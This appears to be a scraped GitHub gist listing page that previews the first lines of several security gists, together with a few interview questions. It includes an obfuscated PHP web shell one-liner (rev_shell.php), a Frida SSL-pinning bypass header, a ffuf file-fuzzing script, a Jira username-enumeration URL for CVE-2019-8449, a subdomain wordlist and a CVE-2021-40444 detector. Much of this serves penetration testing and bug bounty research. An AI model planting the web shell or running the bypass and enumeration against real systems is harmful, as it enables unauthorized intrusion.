-
What is information security and how is it achieved?
-
What are the core principles of information security?
-
What is the CIA triangle?
-
What is non-repudiation (as it applies to IT security)?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
/* | |
* In terminal: | |
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
* This is how the code will be produced, \xa0\xb8\xba\xab will be | |
* treated as constant therefore no " needed. It is also not copyable | |
* string because of non-ascii characters | |
* | |
* Explanation: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51 | |
# ffuf tool https://github.com/ffuf/ffuf | |
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to | |
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal. | |
# usage bash juicy.sh filename.txt | |
filename="$1" | |
while read -r line; do | |
name="$line" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
console.log("[*] SSL Pinning Bypasses"); | |
console.log(`[*] Your frida version: ${Frida.version}`); | |
console.log(`[*] Your script runtime: ${Script.runtime}`); | |
/** | |
* by incogbyte | |
* Common functions | |
* thx apkunpacker, NVISOsecurity, TheDauntless | |
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
* !!! THIS SCRIPT IS NOT A SILVER BULLET !! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"programs": [ | |
{ | |
"name": "spacex", | |
"url": "https://bugcrowd.com/spacex", | |
"wildcards": [ | |
"starlink.com", | |
"starlinkisp.net" | |
], | |
"out_of_scope_domains": [], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cve-2019-8449 | |
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
https://jira.atlassian.com/browse/JRASERVER-69796 | |
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
===================================================================================================================================== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
" _ _ " | |
" _ /|| . . ||\ _ " | |
" ( } \||D ' ' ' C||/ { % " | |
" | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
" |_\_ |----| |----| _/_|" | |
" | |/ | | | | \| |" | |
" | /_ | | | | _\ |" | |
It is all fun and games until someone gets hacked! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
acc | |
accept | |
acceptatie | |
access | |
accounts | |
alpha | |
alt | |
api | |
app | |
apps |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in and even if they do, They don’t have any idea on what type of questions they might face in an interview. | |
Recently | |
@Miss_Malware | |
asked for everyone’s favourites security analyst and DFIR interview question that gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# simple script to detect CVE-2021-40444 exploits in DOCX using oletools | |
# v0.01 Philippe Lagadec 2021-09-09 | |
# IMPORTANT NOTE: this script detects the few samples identified so far, by looking for "mhtml:" in remote objects URLs. | |
# But it is not confirmed yet if this detection is generic enough, for example if "mhtml:" is not mandatory. | |
# Moreover, for now only Office 2007+ files are supported. | |
# Detection for other file types (RTF, Office 97-2003, ...) will be implemented later. | |
import sys, zipfile | |
from oletools import oleobj, ooxml |